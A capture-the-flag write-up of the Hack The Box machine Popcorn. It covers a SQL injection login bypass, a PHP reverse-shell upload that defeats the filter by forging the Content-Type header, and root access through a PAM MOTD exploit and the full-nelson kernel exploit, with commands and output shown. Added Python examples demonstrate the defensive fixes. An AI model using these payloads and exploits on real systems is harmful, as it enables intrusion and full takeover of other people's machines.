Summary

Popcorn is a medium Linux box that is probably on the edge of easy. It can be exploited through a SQL injection authentication bypass, after which you have administrative access to Torrent Hoster. Torrent Hoster is in turn vulnerable to a file upload bypass that gives you a low-privileged reverse shell. Privilege escalation can be done in two ways: the intended way is to exploit motd.legal-displayed, the other is a kernel exploit.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn [ip]

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))

Since only HTTP and SSH are open, the HTTP server is the most likely attack surface. A directory brute-force shows the following files/directories:

http://10.129.36.23/test (Status: 200)
http://10.129.36.23/index (Status: 200)
http://10.129.36.23/torrent (Status: 301)
http://10.129.36.23/rename (Status: 301)

/test is a PHPInfo page, which can be used to gather more information about the target application. The other interesting URL is /torrent, which redirects you to this application:

Let's check whether the login is vulnerable to SQL injection. Intercept the request:

POST /torrent/login.php HTTP/1.1
Host: popcorn.htb
Origin: http://popcorn.htb
Referer: http://popcorn.htb/torrent/login.php
Cookie: /torrent/torrents.php=; /torrent/login.php=; PHPSESSID=743fa39f42c9a84f7959bd080df36c59

username='&password=pass

The username field turns out to be vulnerable; a single quote triggers this error message:

The error is verbose and discloses the executed query:

SELECT userName, password, privilege, email
	FROM users
	WHERE userName = ''' AND password = '3590cb8af0bbb9e78c343b52b93773c9'

You can see the exact SQL command that is executed: the user-supplied value is placed directly inside the quoted string. This is vulnerable to the following payload as username:

' OR 1 -- -

When entering this as the username, you are redirected with: Location: http://popcorn.htb/torrent/torrents.php

You now have access to the admin panel:
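To show why the disclosed query is exploitable and what the fix looks like, here is an added example; it is not code from this writeup or from Torrent Hoster. It rebuilds the query against an in-memory SQLite table with constructed users, runs the username payload shown above against a string-concatenated version and a parameterized version, and reproduces why a lone quote produced the verbose error. Hashing with MD5 is an assumption standing in for whatever the application actually does.

```python
import hashlib
import sqlite3

# Constructed sample users (not data from the box). The application stores a
# 32-hex-character hash per user; MD5 is only an assumed stand-in for whatever
# hashing Torrent Hoster actually performs.
SAMPLE_USERS = [
    ("admin", "s3cret", "admin", "admin@example.invalid"),
    ("george", "pass", "user", "george@example.invalid"),
]


def hash_password(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table shaped like the one the error disclosed."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (userName TEXT, password TEXT, privilege TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(u, hash_password(p), priv, mail) for u, p, priv, mail in SAMPLE_USERS],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The query as the error message showed it: user input is spliced into the
    SQL text, so a quote in the username terminates the string literal and the
    remainder of the input is parsed as SQL."""
    query = (
        "SELECT userName, password, privilege, email FROM users "
        f"WHERE userName = '{username}' AND password = '{hash_password(password)}'"
    )
    return conn.execute(query).fetchone()


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver sends the values separately
    from the SQL text, so the username is compared as one literal string."""
    query = (
        "SELECT userName, password, privilege, email FROM users "
        "WHERE userName = ? AND password = ?"
    )
    return conn.execute(query, (username, hash_password(password))).fetchone()


def error_for_single_quote(conn):
    """Reproduce the verbose error a lone quote triggered on the box. A
    production application should log this and return a generic failure."""
    try:
        login_vulnerable(conn, "'", "pass")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    print("single quote  ->", error_for_single_quote(db))
    print("vulnerable    ->", login_vulnerable(db, "' OR 1 -- -", "x"))
    print("parameterized ->", login_parameterized(db, "' OR 1 -- -", "x"))
```

The vulnerable function returns the first row of the table for the injected username, which is why the bypass lands on the admin account; the parameterized version treats the whole input as a literal username and matches nothing. Two server-side fixes follow: bind parameters instead of building SQL text, and log database errors instead of returning them to the client, since the verbose message is what handed over the query structure in the first place.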


Exploitation

Throughout the application, two upload functions were found: one to upload torrents and one to upload screenshots for the respective torrents. The latter is exploitable. List the torrents and click on the torrent that is already present:

You can edit the screenshot, but the form only accepts images. Let's intercept this request and send a PHP reverse shell instead. The request is as follows:

POST /torrent/upload_file.php?mode=upload&id=723bc28f9b6f924cca68ccdff96b6190566ca6b4 HTTP/1.1
Host: popcorn.htb

Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/php

php-reverse-shell

This is not accepted and shows an error message, since the file is not a valid image. However, changing the Content-Type header to image/png bypasses the upload restriction:

POST /torrent/upload_file.php?mode=upload&id=723bc28f9b6f924cca68ccdff96b6190566ca6b4 HTTP/1.1
Host: popcorn.htb
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/png

php-reverse-shell [...] 
[...]

------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.10
[...]

Nice, the shell is uploaded; the file upload restriction was bypassed simply by changing the Content-Type header. When you refresh the page you will see this:

When you click the image, the uploaded PHP file is executed and opens a reverse shell as www-data. From here you have access to user.txt, which is in george's home directory.
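The upload check that was bypassed trusted a header the client controls. Below is an added example of server-side validation that closes that gap; it is not Torrent Hoster's code or code from this writeup. It ignores the declared Content-Type entirely, allowlists extensions, requires the file content to start with the matching image signature, and discards the client's file name when storing. The two sample uploads are constructed: one mirrors the bypass request above (PHP content declared as image/png), the other is a minimal real PNG header.

```python
import os
import secrets

# Constructed sample uploads (not captured from the box). The first mirrors the
# bypass request in the writeup: PHP content with the Content-Type header
# changed to image/png. The second is a minimal real PNG header.
PHP_DECLARED_AS_PNG = {
    "filename": "shell.php",
    "content_type": "image/png",
    "data": b"<?php echo 'placeholder'; ?>",
}
REAL_PNG = {
    "filename": "screenshot.png",
    "content_type": "image/png",
    "data": b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR",
}

# Extension allowlist with the file signature(s) each extension must carry.
IMAGE_SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(filename, content_type, data):
    """Return (accepted, reason). content_type is taken as an argument only to
    make the point: it is client-controlled and is never consulted here."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension {ext!r} is not an allowed image type"
    if not any(data.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        return False, "content does not start with the signature for " + ext
    return True, "ok"


def stored_name(filename):
    """Never reuse the client's file name on disk: random name, validated extension.
    Call this only after validate_upload has accepted the file."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for sample in (PHP_DECLARED_AS_PNG, REAL_PNG):
        ok, why = validate_upload(**sample)
        print(sample["filename"], "->", "accepted" if ok else "rejected:", why)
```

A signature check alone is still not sufficient: an image file with PHP appended would pass it. The decisive control is where and how the file is served: store uploads outside the document root or in a directory for which the web server has no PHP handler, and serve them with a fixed image Content-Type, so that a file that slips through is never executed. The check above removes the exact weakness this writeup exploits, namely trusting a header the uploader supplies.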


Privilege Escalation

There are two methods. The intended method is noticing that a file named motd.legal-displayed is stored in the .cache directory. This is peculiar, and when you search for it on Google you will find this exploit. When transferred to the box and executed, it gives you a root shell:

bash pam_motd.sh 
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: 
root@popcorn:/dev/shm#

The other method is to run Linux Exploit Suggester:

Possible Exploits:

[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson

   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c

It finds this vulnerability and indicates that it is highly probable to work. Let's try it as well:

www-data@popcorn:/tmp$ gcc full-nelson.c -o exploit

www-data@popcorn:/tmp$ ./exploit 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf83cb280
 [+] Resolved econet_ops to 0xf83cb360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
root

Conclusion

This was a really enjoyable box. It was quite fun to mess around with the web application and to find that uploading a torrent is not the way to go; instead you should look further and find the screenshot upload function. From there on it is pretty straightforward, especially if you use the kernel exploit. I think this should be an easy box, but I believe that HTB's older boxes are a lot easier than the current ones. I hope you enjoyed this writeup!